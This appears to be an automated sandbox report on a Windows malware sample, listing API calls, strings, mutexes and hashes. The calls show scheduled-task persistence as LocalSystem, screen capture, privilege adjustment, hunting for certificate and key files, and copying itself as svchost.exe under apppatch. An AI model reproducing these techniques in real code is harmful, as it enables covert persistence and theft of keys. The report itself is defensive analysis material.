                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F15D319046465BCB258F3098A4BFB7BF6EF45344FA485C8ED869B241DB32DA49C7A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • <Actions , xrefs: 0040380A
                                                                                                                                                                                                            • task%d, xrefs: 0040365C
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                            • 00-->, xrefs: 0040383F
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                            • API String ID: 1601901853-1561668989
                                                                                                                                                                                                            • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 02BC2053
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02BC2064
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02BC2079
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BC208E
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02BC20A8
                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02BC20D6
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 02BC20EC
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32 ref: 02BC215C
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02BC216F
                                                                                                                                                                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02BC218C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02BC255E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02BC21A6
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC21CD
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC21EF
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BC255E,00000001,00000010,00000000,00000000,00000000,?), ref: 02BC2209
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC2214
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC223C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 02BC224C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02BC2260
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 02BC2270
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC227F
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 02BC228F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02BC22A3
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,00000028,00000000), ref: 02BC22B3
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BC22CC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BC22DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02BC22EE
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BC22FD
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 02BC2308
                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 02BC230F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC2323
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC2335
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BC2340
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 02BC234C
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02BC2358
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$GlobalLockSecurityUnlock$CreateDescriptorObjectPointerTokenWrite$CloseCompatibleCurrentFreeHandleOpenProcessReleaseThread$AdjustAllocBitmapBitsChangeConvertCursorDeleteErrorFindInfoInformationLastLocalLookupNamedNotificationPrivilegePrivilegesSaclSelectStringValue
                                                                                                                                                                                                            • String ID: ($6$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 2969484848-808120212
                                                                                                                                                                                                            • Opcode ID: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                            • Instruction ID: 7ccd0a5ff0d4d5a762415c6fb49a14866f6acfd14a00cb9e85bb6be09aae408b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f6edfab599cb525770d5883a4ce0e90cb54a9bd3dd33fcae9a93b11e0878954
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6914BB2545300AFE3609F64DC88EABBBECEFC8785F508A1DF68597240D7709905CB62
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774), ref: 02BCF9E8
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA29
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFA2F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFA37
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0DDC8), ref: 02BCFA46
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFA4D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02C0DDC8,00000000), ref: 02BCFA89
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02C0DDC8), ref: 02BCFA94
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774,?,?), ref: 02BCFAD6
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB11
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFB17
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFB1F
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB2E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFB35
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02C0D998,00000000), ref: 02BCFB63
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCFB69
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCFB71
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02C0D998), ref: 02BCFB80
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCFB87
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCFB91
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCFBC7
                                                                                                                                                                                                            • SHFileOperationA.SHELL32(?), ref: 02BCFC41
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFC52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214},00000006), ref: 02BCFC6F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCFC76
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFC88
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCFC98
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCAA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCFCAD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCFCBA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCFCBD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$keys\$path.txt
                                                                                                                                                                                                            • API String ID: 959110331-3127126710
                                                                                                                                                                                                            • Opcode ID: b9282ae7e1ce46db3fefa15dd8aec3ea006fdeb9739a456987e953bd44b45b0f
                                                                                                                                                                                                            • Instruction ID: 5e8e7231d5f322158e474f43c9312e40ee0a3bcf937641c87bc4bef6abcdcdc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9282ae7e1ce46db3fefa15dd8aec3ea006fdeb9739a456987e953bd44b45b0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE91F730E407469FEB214F78A858BABBFE5EF4A740F6485DAE986D7340DB708510C7A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: IsUserAnAdmin.SHELL32 ref: 02BB7C8A
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CC1
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: memset.MSVCRT ref: 02BB7CD9
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,76F8F380), ref: 02BB7CFB
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,76F8F380), ref: 02BB7D21
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,76F8F380), ref: 02BB7DAD
                                                                                                                                                                                                              • Part of subcall function 02BB7C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,76F8F380), ref: 02BB7DB4
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8105
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BB8112
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02BB8124
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB812D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB8145
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB8157
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8162
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8165
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8172
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8175
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8182
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8185
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8192
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8195
                                                                                                                                                                                                            • SetCaretBlinkTime.USER32(000000FF), ref: 02BB81A7
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02BB81D5
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(00000000,69889110a,69889191a), ref: 02BB8205
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8215
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8218
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8225
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8228
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,69889110a,69889191a), ref: 02BB8235
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB8238
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB8245
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB8248
                                                                                                                                                                                                            • Sleep.KERNEL32(00001388,69889110a,69889191a), ref: 02BB8253
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02BB8285
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 02BB82A5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB82BD
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB82CF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB82F2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB830C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                            • String ID: 69889110a$69889191a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                            • API String ID: 2871222221-139645038
                                                                                                                                                                                                            • Opcode ID: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                            • Instruction ID: 831aca38907dfe62bddd1553c83d58595776b516f6e71ab4e18650b822dc7f69
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fc660a88280c8a87043753b7a18c4c0576a1e6a04dfde033d2f8ab01ae2346a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D351E331A817016BE7726B749C4CFBB376DEF44B95F444A94FA599B180DBB0C810CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCC86F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCC8A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCC8E7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCC8F1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCC8F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCC90A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCC911
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,crypto), ref: 02BCC923
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer), ref: 02BCC936
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.pub), ref: 02BCC947
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCC992
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCC99F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                              • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCEB4E
